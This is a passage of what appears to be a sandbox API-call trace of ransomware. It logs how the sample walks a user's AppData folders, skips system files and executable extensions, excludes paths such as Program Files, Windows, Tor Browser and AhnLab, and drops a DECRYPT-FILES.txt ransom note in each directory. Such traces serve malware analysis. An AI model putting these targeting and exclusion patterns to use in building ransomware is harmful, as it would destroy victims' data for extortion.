(lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.311] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.311] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.311] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.311] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.311] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.311] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.311] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0077.311] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.312] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0077.312] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\jkbimi8.tmp" [0077.312] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.312] CloseHandle (hObject=0x0) returned 0 [0077.312] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.312] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d241020, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d241020, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 1 [0077.312] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0077.312] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0077.312] lstrcatW (in: lpString1="macromedia.com", lpString2="\\" | out: lpString1="macromedia.com\\") returned="macromedia.com\\" [0077.312] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="macromedia.com\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0077.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Program Files") returned 0x0 [0077.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch=":\\Windows") returned 0x0 [0077.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Games\\") returned 0x0 [0077.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.312] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\All Users") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="AhnLab") returned 0x0 [0077.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.313] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0077.313] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.313] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\jkbimi8.tmp") returned 97 [0077.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.314] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0077.314] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.314] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\DECRYPT-FILES.txt") returned 103 [0077.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.314] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.315] CloseHandle (hObject=0x454) returned 1 [0077.315] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0077.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0077.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.316] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.316] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.316] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.316] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.316] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.316] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.316] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.316] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.316] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.316] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.316] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.316] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.316] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0077.316] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.316] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0077.316] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\jkbimi8.tmp" [0077.316] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.317] CloseHandle (hObject=0x0) returned 0 [0077.317] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.317] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 1 [0077.317] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0077.317] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0077.317] lstrcatW (in: lpString1="support", lpString2="\\" | out: lpString1="support\\") returned="support\\" [0077.317] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="support\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Program Files") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch=":\\Windows") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Games\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\All Users") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="AhnLab") returned 0x0 [0077.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.317] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0077.317] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.317] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\jkbimi8.tmp") returned 105 [0077.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0077.319] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0077.319] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.319] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\DECRYPT-FILES.txt") returned 111 [0077.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0077.321] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0077.322] CloseHandle (hObject=0x45c) returned 1 [0077.322] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0077.322] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0077.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0077.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.322] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.322] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.322] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.322] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.322] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 1 [0077.322] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0077.322] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0077.322] lstrcatW (in: lpString1="flashplayer", lpString2="\\" | out: lpString1="flashplayer\\") returned="flashplayer\\" [0077.322] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="flashplayer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0077.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Program Files") returned 0x0 [0077.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch=":\\Windows") returned 0x0 [0077.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Games\\") returned 0x0 [0077.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.323] 